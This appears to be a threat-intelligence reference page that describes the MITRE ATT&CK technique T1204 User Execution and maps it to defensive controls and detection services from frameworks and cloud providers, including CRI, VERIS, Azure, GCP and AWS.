T1204 User Execution

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing.

While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Adversaries may also deceive users into performing actions such as:

  • Enabling Remote Access Software, allowing direct control of the system to the adversary
  • Running malicious JavaScript in their browser, allowing adversaries to Steal Web Session Cookies(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
  • Downloading and executing malware for User Execution
  • Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)

For example, tech support scams can be facilitated through Phishing, vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or Remote Access Software.(Citation: Telephone Attack Delivery)

View in MITRE ATT&CK®

CRI Profile Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
DE.AE-02.01 Event analysis and detection Mitigates T1204 User Execution
Comments
This diagnostic statement provides for implementation of methods to block similar future attacks via security tools such as antivirus and IDS/IPS to provide protection against threats and exploitation attempts.
References
    DE.CM-01.01 Intrusion detection and prevention Mitigates T1204 User Execution
    Comments
    In order to protect users from being victims of social engineering attacks, network intrusion prevention techniques can be used to scan and block malicious code from malicious downloads and malicious activity.
    References
      PR.PS-01.03 Configuration deviation Mitigates T1204 User Execution
      Comments
      This diagnostic statement provides protection from User Execution through the implementation of security configuration baselines for OS, software, file integrity monitoring and imaging. Security baselining and integrity checking can help protect against adversaries attempting to execute malicious unsigned code.
      References
        PR.PS-01.09 Virtualized end point protection Mitigates T1204 User Execution
        Comments
        The diagnostic statement highlights several mechanisms that organizations can implement to protect endpoint systems using virtualization technologies, essentially hypervisor hardening. With this technique, adversaries may use may use an existing VM leveraging a legitimate external Web service to exfiltrate data rather than their primary command and control channel. The use of hypervisor application control may detect and block this type of behavior from occurring.
        References
          DE.CM-01.05 Website and service blocking Mitigates T1204 User Execution
          Comments
          This diagnostic statement protects user execution through the implementation of tools and measures to block unknown or unused files in transit.
          References
            PR.PS-01.09 Virtualized end point protection Mitigates T1204 User Execution
            Comments
            The diagnostic statement highlights several mitigating controls that organizations can implement to protect endpoint systems using virtualization technologies. Adversaries may rely on a user running a malicious image to facilitate execution. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the virtualized instance or container. Mitigating controls such as execution prevention, NIPS, EDRs and behavior prevention on endpoints may provide mitigating mechanisms to prevent the running of executables coming from virtualized machines onto the host or network.
            References
              PR.IR-01.03 Network communications integrity and availability Mitigates T1204 User Execution
              Comments
              This diagnostic statement protects against User Execution through the use of secure network configurations, architecture, implementations of zero trust architecture, and segmentation.
              References

                NIST 800-53 Mappings

                VERIS Mappings

                Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                action.malware.variety.Other Other related-to T1204 User Execution
                action.malware.variety.Downloader Downloader (pull updates or other malware) related-to T1204 User Execution
                action.social.variety.Phishing Any type of *ishing. Phishing always involves getting data from the victim. Phishing usually has some element of pretexting, but often it doesn’t rise to the level of an invented scenario. E.g. A fake google login page isn’t really pretexting. related-to T1204 User Execution
                action.social.vector.Email Email related-to T1204 User Execution
                action.social.vector.Social media Social media or networking related-to T1204 User Execution

                Azure Mappings

                Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                alerts_for_windows_machines Alerts for Windows Machines technique_scores T1204 User Execution
                Comments
                This control provides detection for one of the two sub-techniques of this technique, Malicious File, resulting in a Partial Coverage score and consequently an overall score of Partial.
                References
                azure_firewall Azure Firewall technique_scores T1204 User Execution
                Comments
                This control provides partial protection for this technique.
                References
                azure_network_watcher_traffic_analytics Azure Network Watcher: Traffic Analytics technique_scores T1204 User Execution
                Comments
                This control can detect network traffic associated with this technique.
                References
                defender_for_app_service Microsoft Defender for Cloud: Defender for App Service technique_scores T1204 User Execution
                defender_for_containers Microsoft Defender for Containers technique_scores T1204 User Execution
                Comments
                This control can detect container behavior associated with this technique.
                References
                microsoft_antimalware_for_azure Microsoft Antimalware for Azure technique_scores T1204 User Execution

                GCP Mappings

                Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                google_secops Google Security Operations technique_scores T1204 User Execution
                Comments
                Google Security Ops is able to trigger an alert based on suspicious user activity (e.g., clicking on a malicious links). This technique was scored as minimal based on low or uncertain detection coverage factor. https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/proxy/microsoft_teams_phishing_email.yaral https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/process_creation/detect_possible_execution_of_phishing_attachment.yaral
                References

                AWS Mappings

                Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                aws_config AWS Config technique_scores T1204 User Execution
                Comments
                This control provides significant coverage for one of this technique's sub-techniques, resulting in an overall score of Minimal.
                References

                ATT&CK Subtechniques

                Technique ID Technique Name Number of Mappings
                T1204.002 Malicious File 21
                T1204.003 Malicious Image 31
                T1204.001 Malicious Link 20